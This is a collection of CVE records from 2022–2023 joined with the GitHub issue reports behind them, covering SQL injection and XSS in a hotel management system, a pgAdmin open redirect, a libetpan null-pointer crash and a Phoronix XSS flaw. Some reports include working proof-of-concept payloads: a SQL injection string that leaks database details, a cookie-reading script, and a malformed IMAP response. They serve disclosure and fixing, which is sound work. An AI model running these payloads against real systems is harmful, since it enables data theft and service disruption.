{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tramyardg/hotel-mgmt-system/issues/21" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tramyardg/hotel-mgmt-system/issues/21" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hotel_management_system_project:hotel_management_system:2022-04-11:*:*:*:*:*:*:*", "matchCriteriaId": "73E2E1C1-CAD7-4132-9DDF-7416942A7CA1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/tramyardg/hotel-mgmt-system/issues/21
[ "Exploit", "Third Party Advisory" ]
github.com
[ "tramyardg", "hotel-mgmt-system" ]
## List of Vulnerable path Vulnerable path /app/dao/CustomerDAO.php Vulnerable path /app/handlers/CustomerHandler.php Vulnerable path /app/process_update_profile.php Lines 49-59 of the "CustomerDAO.php" file splice the sql word,so bypass the PDO. ![sql.png](https://cdn.nlark.com/yuque/0/2022/png/29671361/1672221304888-1fd964fb-82f2-437f-8ad0-e92d50a0d134.png#averageHue=%232e3133&clientId=ubb2ec1f8-41c4-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u65b111d8&margin=%5Bobject%20Object%5D&name=sql.png&originHeight=1080&originWidth=1920&originalType=binary&ratio=1&rotation=0&showTitle=false&size=395052&status=done&style=none&taskId=u023e6017-04ee-49a5-88d8-2fc307d80ab&title=) Line 98 of the "CustomerHandler.php" use the vulnerable function. ![sql2.png](https://cdn.nlark.com/yuque/0/2022/png/29671361/1672221387069-afd7cb7d-4f73-4401-9a1b-55525d9454f0.png#averageHue=%232e3133&clientId=ubb2ec1f8-41c4-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u5cc4f3df&margin=%5Bobject%20Object%5D&name=sql2.png&originHeight=1015&originWidth=1915&originalType=binary&ratio=1&rotation=0&showTitle=false&size=290950&status=done&style=none&taskId=u2542637c-2bf0-402c-a4a0-87313e311d1&title=) Lines 31-40 of the "process_update_profile.php" use the vulnerable function. ![sql3.png](https://cdn.nlark.com/yuque/0/2022/png/29671361/1672221441175-e2564247-3c1b-4bdd-8bd2-d7e81bcf8d89.png#averageHue=%232e3132&clientId=ubb2ec1f8-41c4-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u36c25832&margin=%5Bobject%20Object%5D&name=sql3.png&originHeight=1020&originWidth=1911&originalType=binary&ratio=1&rotation=0&showTitle=false&size=254461&status=done&style=none&taskId=ucd0f4e55-9ada-4087-8b72-ca494aa2084&title=) ## Vulnerability exploitation process: After the user logged in, click the button "update proflie". ![log1.png](https://cdn.nlark.com/yuque/0/2022/png/29671361/1672222219156-9de566ba-1d82-4b46-bf05-5c502d67f9d7.png#averageHue=%23acb1b4&clientId=ubb2ec1f8-41c4-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u326e5035&margin=%5Bobject%20Object%5D&name=log1.png&originHeight=1038&originWidth=1858&originalType=binary&ratio=1&rotation=0&showTitle=false&size=144470&status=done&style=none&taskId=uc86b4107-1ad1-4102-97b3-f710237c194&title=) Then input the poc and click "update". ![log2.png](https://cdn.nlark.com/yuque/0/2022/png/29671361/1672222329832-49d10c02-6d84-4075-92c0-1a8f8d2a093b.png#averageHue=%232f663f&clientId=ubb2ec1f8-41c4-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=uc7fb8393&margin=%5Bobject%20Object%5D&name=log2.png&originHeight=1002&originWidth=1837&originalType=binary&ratio=1&rotation=0&showTitle=false&size=112469&status=done&style=none&taskId=u21ee9890-9246-4145-ab72-9a7dcd21a30&title=) After that,refresh it and click "update profile",you can see the data from database. ![log3.png](https://cdn.nlark.com/yuque/0/2022/png/29671361/1672222446455-ae78895a-9b0c-49bf-86e2-4571d4fa398f.png#averageHue=%232e653d&clientId=ubb2ec1f8-41c4-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=ub08175a5&margin=%5Bobject%20Object%5D&name=log3.png&originHeight=987&originWidth=1715&originalType=binary&ratio=1&rotation=0&showTitle=false&size=97351&status=done&style=none&taskId=ub5c84ecb-8719-47f2-9645-d42970bd265&title=) ## POC code: ```sql youyou",password = "", phone = concat(database(),version()) WHERE `customer`.`cid`="10"# ```
tramyardg-hotel-mgmt-system of version2022.4 has a SQL injection vulnerability
https://api.github.com/repos/tramyardg/hotel-mgmt-system/issues/21/comments
1
2022-12-28T10:48:24Z
2023-02-26T05:25:18Z
https://github.com/tramyardg/hotel-mgmt-system/issues/21
1,512,666,015
21
4,617
CVE-2022-48091
2023-01-13T19:15:11.823
Tramyardg hotel-mgmt-system version 2022.4 is vulnerable to Cross Site Scripting (XSS) via process_update_profile.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tramyardg/hotel-mgmt-system/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/tramyardg/hotel-mgmt-system/issues/22" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hotel_management_system_project:hotel_management_system:2022-04-11:*:*:*:*:*:*:*", "matchCriteriaId": "73E2E1C1-CAD7-4132-9DDF-7416942A7CA1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/tramyardg/hotel-mgmt-system/issues/22
[ "Exploit", "Third Party Advisory" ]
github.com
[ "tramyardg", "hotel-mgmt-system" ]
## List of Vulnerable path Vulnerable path /app/process_update_profile.php Lines 32-37 of the "process_update_profile.php" file,there is no filtering,so cause Cross Site Script. ![xss1.png](https://cdn.nlark.com/yuque/0/2022/png/29671361/1672226686418-c55591ff-1a8c-4363-b29b-60e8f0ef5d71.png#averageHue=%232e3132&clientId=uccc037a6-e374-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u13853a11&margin=%5Bobject%20Object%5D&name=xss1.png&originHeight=997&originWidth=1846&originalType=binary&ratio=1&rotation=0&showTitle=false&size=241158&status=done&style=none&taskId=u934ea78a-e8f1-4283-b901-3b87f068c72&title=) In fact,the filter was forgot.Another file has a filter . Its path /app/process_registration.php ![xss2.png](https://cdn.nlark.com/yuque/0/2022/png/29671361/1672227016385-f793ef20-e8d4-46f5-8c2d-df29492aedbc.png#averageHue=%232e3132&clientId=uccc037a6-e374-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u49af8fab&margin=%5Bobject%20Object%5D&name=xss2.png&originHeight=1006&originWidth=1812&originalType=binary&ratio=1&rotation=0&showTitle=false&size=272051&status=done&style=none&taskId=ucdce2b17-48d3-487e-afd1-3a5c98507b0&title=) ![xss3.png](https://cdn.nlark.com/yuque/0/2022/png/29671361/1672227024073-e462b76c-4ecc-4f90-9531-a6df0c2d7464.png#averageHue=%232a302c&clientId=uccc037a6-e374-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=uc8f7ef49&margin=%5Bobject%20Object%5D&name=xss3.png&originHeight=975&originWidth=1721&originalType=binary&ratio=1&rotation=0&showTitle=false&size=192862&status=done&style=none&taskId=u6333ccda-3ae0-47cb-84be-19e81877085&title=) The data is safe when user register,but it is unsafe after update. ## Vulnerability exploitation process: register a new account. ![reg1.png](https://cdn.nlark.com/yuque/0/2022/png/29671361/1672227410522-eff19370-ed25-468c-b508-7d8d0c91047b.png#averageHue=%23aeb2b6&clientId=uccc037a6-e374-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=ud305467e&margin=%5Bobject%20Object%5D&name=reg1.png&originHeight=897&originWidth=1842&originalType=binary&ratio=1&rotation=0&showTitle=false&size=94633&status=done&style=none&taskId=u35bcfdac-65db-4973-a467-1d2b6b3f6ec&title=) ![reg2.png](https://cdn.nlark.com/yuque/0/2022/png/29671361/1672227419717-109a4925-b5e5-406d-8795-1bc061bcf568.png#averageHue=%23aabfa6&clientId=uccc037a6-e374-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u8b92c4ce&margin=%5Bobject%20Object%5D&name=reg2.png&originHeight=1027&originWidth=1385&originalType=binary&ratio=1&rotation=0&showTitle=false&size=73433&status=done&style=none&taskId=u3b53b326-5263-45c0-9e93-48a386508f7&title=) login the user and click "update profile". ![up1.png](https://cdn.nlark.com/yuque/0/2022/png/29671361/1672227547460-0d4fec9e-953c-4fff-b6e7-12d56edf8884.png#averageHue=%23acb0b4&clientId=uccc037a6-e374-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u2a6969c4&margin=%5Bobject%20Object%5D&name=up1.png&originHeight=997&originWidth=1767&originalType=binary&ratio=1&rotation=0&showTitle=false&size=94404&status=done&style=none&taskId=u9fa568b5-8f33-4e96-82fb-fc6ea190154&title=) input poc and submit. ![a1.png](https://cdn.nlark.com/yuque/0/2022/png/29671361/1672228299821-23aed25a-0588-4802-a359-a232c29a5242.png#averageHue=%232e653e&clientId=uccc037a6-e374-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=udefeed5f&margin=%5Bobject%20Object%5D&name=a1.png&originHeight=953&originWidth=1830&originalType=binary&ratio=1&rotation=0&showTitle=false&size=91701&status=done&style=none&taskId=u8b7ac359-d335-4134-92d7-3b2a21185a8&title=) The administrator will trigger it. ![a2.png](https://cdn.nlark.com/yuque/0/2022/png/29671361/1672228538461-f57ed16c-78ae-44d5-9888-b6accb48bd62.png#averageHue=%23b1b5b9&clientId=uccc037a6-e374-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u33b938fc&margin=%5Bobject%20Object%5D&name=a2.png&originHeight=956&originWidth=1776&originalType=binary&ratio=1&rotation=0&showTitle=false&size=97391&status=done&style=none&taskId=u5d1317f4-435e-4825-8e7f-d68230bef0f&title=) ![a3.png](https://cdn.nlark.com/yuque/0/2022/png/29671361/1672228617707-27eadfb1-c20b-4aa3-8dfe-8c4815941bed.png#averageHue=%23f9f7f3&clientId=uccc037a6-e374-4&crop=0&crop=0&crop=1&crop=1&from=drop&id=u43a0ef5b&margin=%5Bobject%20Object%5D&name=a3.png&originHeight=995&originWidth=1735&originalType=binary&ratio=1&rotation=0&showTitle=false&size=131905&status=done&style=none&taskId=u9c301b35-7225-4237-9793-d369640dcfc&title=) ## POC code: ```html <script>alert('youyou_pm10'+document.cookie);</script> ```
tramyardg-hotel-mgmt-system of version2022.4 has a Cross Site Script(XSS) vulnerability
https://api.github.com/repos/tramyardg/hotel-mgmt-system/issues/22/comments
0
2022-12-28T12:03:16Z
2023-02-26T05:47:20Z
https://github.com/tramyardg/hotel-mgmt-system/issues/22
1,512,727,145
22
4,618
CVE-2016-15018
2023-01-15T19:15:09.167
A vulnerability was found in krail-jpa up to 0.9.1. It has been classified as critical. This affects an unknown part. The manipulation leads to sql injection. Upgrading to version 0.9.2 is able to address this issue. The identifier of the patch is c1e848665492e21ef6cc9be443205e36b9a1f6be. It is recommended to upgrade the affected component. The identifier VDB-218373 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 5.2, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 5.1, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/KrailOrg/krail-jpa/commit/c1e848665492e21ef6cc9be443205e36b9a1f6be" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/KrailOrg/krail-jpa/issues/18" }, { "source": "cna@vuldb.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/KrailOrg/krail-jpa/releases/tag/0.9.2" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.218373" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.218373" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/KrailOrg/krail-jpa/commit/c1e848665492e21ef6cc9be443205e36b9a1f6be" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/KrailOrg/krail-jpa/issues/18" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/KrailOrg/krail-jpa/releases/tag/0.9.2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?ctiid.218373" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.218373" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:krail-jpa_project:krail-jpa:*:*:*:*:*:*:*:*", "matchCriteriaId": "9010B121-A84D-4EF8-8690-35E0ED8F1FCB", "versionEndExcluding": "0.9.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/KrailOrg/krail-jpa/issues/18
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "KrailOrg", "krail-jpa" ]
From FindBugs, 2 bugs identified in ``` DefaultOptionJpaDao_LongInt``` ```
query is potentially vulnerable SQL/JPQL injection
https://api.github.com/repos/KrailOrg/krail-jpa/issues/18/comments
0
2015-08-08T11:25:19Z
2018-04-05T17:28:08Z
https://github.com/KrailOrg/krail-jpa/issues/18
99,795,313
18
4,619
CVE-2023-22298
2023-01-17T10:15:11.657
Open redirect vulnerability in pgAdmin 4 versions prior to v6.14 allows a remote unauthenticated attacker to redirect a user to an arbitrary web site and conduct a phishing attack by having a user to access a specially crafted URL.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "vultures@jpcert.or.jp", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/pgadmin-org/pgadmin4" }, { "source": "vultures@jpcert.or.jp", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/pgadmin-org/pgadmin4/issues/5343" }, { "source": "vultures@jpcert.or.jp", "tags": [ "Third Party Advisory" ], "url": "https://jvn.jp/en/jp/JVN03832974/index.html" }, { "source": "vultures@jpcert.or.jp", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VHY2B25YHIIFQ3G44TR7NNEST7FJGJPH/" }, { "source": "vultures@jpcert.or.jp", "tags": [ "Vendor Advisory" ], "url": "https://www.pgadmin.org/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/pgadmin-org/pgadmin4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/pgadmin-org/pgadmin4/issues/5343" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://jvn.jp/en/jp/JVN03832974/index.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VHY2B25YHIIFQ3G44TR7NNEST7FJGJPH/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.pgadmin.org/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pgadmin:pgadmin:*:*:*:*:*:postgresql:*:*", "matchCriteriaId": "FF5A5374-1FBF-4FAA-B908-5073F6764CA8", "versionEndExcluding": "6.14", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "4.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "601" ]
601
https://github.com/pgadmin-org/pgadmin4/issues/5343
[ "Patch", "Third Party Advisory" ]
github.com
[ "pgadmin-org", "pgadmin4" ]
Currently, when pgAdmin is running in server mode and user opens the pgAdmin URL, it opens login page with redirect URL to /browser of pgAdmin using `next` param. The vulnerability allows a remote attacker to redirect victims to arbitrary URL.
Open URL Redirect Vulnerability
https://api.github.com/repos/pgadmin-org/pgadmin4/issues/5343/comments
2
2022-09-19T09:04:14Z
2023-04-21T19:26:51Z
https://github.com/pgadmin-org/pgadmin4/issues/5343
1,377,635,920
5,343
4,620
CVE-2022-4121
2023-01-17T18:15:11.583
In libetpan a null pointer dereference in mailimap_mailbox_data_status_free in low-level/imap/mailimap_types.c was found that could lead to a remote denial of service or other potential consequences.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/dinhvh/libetpan/commit/5c9eb6b6ba64c4eb927d7a902317410181aacbba" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/dinhvh/libetpan/issues/420" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/dinhvh/libetpan/commit/5c9eb6b6ba64c4eb927d7a902317410181aacbba" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/dinhvh/libetpan/issues/420" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libetpan_project:libetpan:-:*:*:*:*:*:*:*", "matchCriteriaId": "6A0D1B29-C9D4-41DF-BC27-693F54591519", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/dinhvh/libetpan/issues/420
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "dinhvh", "libetpan" ]
## IMAP STATUS Command Null Pointer Dereference A segmentation fault due to a null pointer dereference has been found in the IMAP STATUS command handling component. The error occurs when `mailimap_mailbox_data_status_free` in low-level/imap/mailimap_types.c when it tries to free `st_info_list` of `mb_data_status`. The segmentation fault is triggered when an invalid `STATUS` response is received. This can at least lead to a Denial Of Service. I have attached a ZIP file, which contains files needed for reproduction. ### How to reproduce See `reproduction_logs.txt` in ZIP on how to reproduce. Expected output: ``` dummy@dummy-mars:~/VResearch/$ LD_LIBRARY_PATH=$LD_LIBRARY_PATH:libetpan/src/.libs/ ./sender abc abc connect: 2 Building structure list Sending STATUS .. Segmentation fault (core dumped) ``` ### Explanation of Vulnerability The null pointer dereference occurs when the `mailimap_mailbox_data_status` structure in `mailimap_mailbox_data_status_free` is trying to be freed and the `info->st_info_list` contains a NULL pointer/is NULL. ``` * STATUS "RUU" () ``` When the `STATUS` response above is received `mailimap_mailbox_data_status_parse` is called. `mailimap_mailbox_data_status_parse` will call `mailimap_struct_spaced_list_parse`. Due to invalid info fields in `STATUS` response, `mailimap_struct_spaced_list_parse` will return a `MAILIMAP_ERROR_PARSE (code 5)`. With info fields, I am referring to the information fields that should be included inside the parentheses. `mailimap_mailbox_data_status_parse` does not stop execution when a `MAILIMAP_ERROR_PARSE` is received. Instead, it will continue and call `mailimap_mailbox_data_status_new` passing down the `status_info_list` again, which is NULL. See https://github.com/dinhvh/libetpan/blob/master/src/low-level/imap/mailimap_parser.c#L6613 for the `MAILIMAP_ERROR_PARSE` check. `mailimap_mailbox_data_status_new` will then not check whether `st_info_list` is NULL and add to `mb_data_status`. Below is the snippet of `mailimap_mailbox_data_status_new`. ```c LIBETPAN_EXPORT struct mailimap_mailbox_data_status * mailimap_mailbox_data_status_new(char * st_mailbox, clist * st_info_list) { struct mailimap_mailbox_data_status * mb_data_status; mb_data_status = malloc(sizeof(* mb_data_status)); if (mb_data_status == NULL) return NULL; mb_data_status->st_mailbox = st_mailbox; // st_info_list is NULL here mb_data_status->st_info_list = st_info_list; return mb_data_status; } ``` Later, when `mailimap_mailbox_data_status_free` is called to attempt to free the built-up structures, the function does not check whether `st_info_list` is valid and passes it to `clist_foreach`. Below are snippets of `clist_foreach` and `clist_begin` to illustrate the issue. If a NULL pointer is passed down, this will lead to a segmentation fault. ```c void clist_foreach(clist * lst, clist_func func, void * data) { clistiter * cur; for(cur = clist_begin(lst) ; cur != NULL ; cur = cur->next) func(cur->data, data); } clistiter * clist_begin(clist * lst) { return lst->first; } ``` ### Simplest Fix The simplest fix I could come up with in a short time period was to check inside `mailimap_mailbox_data_status_new` whether `st_info_list` is NULL. If yes, return NULL. See below: ```c LIBETPAN_EXPORT struct mailimap_mailbox_data_status * mailimap_mailbox_data_status_new(char * st_mailbox, clist * st_info_list) { struct mailimap_mailbox_data_status * mb_data_status; mb_data_status = malloc(sizeof(* mb_data_status)); // added check whether st_info_list is NULL if (mb_data_status == NULL || st_info_list == NULL) return NULL; mb_data_status->st_mailbox = st_mailbox; mb_data_status->st_info_list = st_info_list; return mb_data_status; } ``` Happy to discuss further and helping in fixing this vulnerability! [PoC-NullPtrDeref-STATUS.zip](https://github.com/dinhvh/libetpan/files/9565368/PoC-NullPtrDeref-STATUS.zip)
Null Pointer Dereference STATUS Response
https://api.github.com/repos/dinhvh/libetpan/issues/420/comments
3
2022-09-14T10:16:22Z
2022-12-19T16:17:05Z
https://github.com/dinhvh/libetpan/issues/420
1,372,726,252
420
4,621
CVE-2022-40704
2023-01-17T19:15:11.530
A XSS vulnerability was found in phoromatic_r_add_test_details.php in phoronix-test-suite.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/phoronix-test-suite/phoronix-test-suite/commit/d3880d9d3ba795138444da83f1153c3c3ac27640" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phoronix-test-suite/phoronix-test-suite/issues/650" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/phoronix-test-suite/phoronix-test-suite/commit/d3880d9d3ba795138444da83f1153c3c3ac27640" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/phoronix-test-suite/phoronix-test-suite/issues/650" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:phoronix-media:phoronix_test_suite:*:*:*:*:*:*:*:*", "matchCriteriaId": "A8D55ADF-EAC6-498D-86CD-FEAA55D140E4", "versionEndExcluding": "2022-07-23", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/phoronix-test-suite/phoronix-test-suite/issues/650
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "phoronix-test-suite", "phoronix-test-suite" ]
Hello, I would like to report for possible XSS vulnerability. In file https://github.com/phoronix-test-suite/phoronix-test-suite/blob/master/pts-core/phoromatic/pages/phoromatic_r_add_test_details.php ```php \\line 41 // Note: the source $test_profile = new pts_test_profile($_GET['tp']); ``` In file https://github.com/phoronix-test-suite/phoronix-test-suite/blob/master/pts-core/objects/pts_test_profile.php ```php public function __construct($identifier = null, $override_values = null, $normal_init = true){ parent::__construct($identifier, $normal_init); //... } ``` In file https://github.com/phoronix-test-suite/phoronix-test-suite/blob/master/pts-core/objects/pts_test_profile_parser.php ```php public function __construct($read = null, $normal_init = true){ //... $this->xml = simplexml_load_string($read, 'SimpleXMLElement', $xml_options); } ``` Now the input is in the xml property in object $test_profile. In file https://github.com/phoronix-test-suite/phoronix-test-suite/blob/master/pts-core/phoromatic/pages/phoromatic_r_add_test_details.php ```php //line 47 if(!empty($supported_os = $test_profile->get_supported_platforms())){ // Note: the sink echo '<p>This test is supported on <strong>' . implode(', ', $supported_os) . '</strong>.</p>'; } ``` In file https://github.com/phoronix-test-suite/phoronix-test-suite/blob/master/pts-core/objects/pts_test_profile_parser.php ```php public function get_supported_platforms_raw(){ return $this->xg('TestProfile/SupportedPlatforms'); } public function xg($xpath, $default_on_null = null){ //... $r = $this->xml ? $this->xml->xpath($xpath) : null; //... return $r; } ``` Thus the input will be controlled by the attacker, saved in the xml then extracted and printed through the variable $supported_os.
Possible XSS vulnerability
https://api.github.com/repos/phoronix-test-suite/phoronix-test-suite/issues/650/comments
4
2022-07-20T13:08:37Z
2022-12-30T15:07:15Z
https://github.com/phoronix-test-suite/phoronix-test-suite/issues/650
1,311,066,913
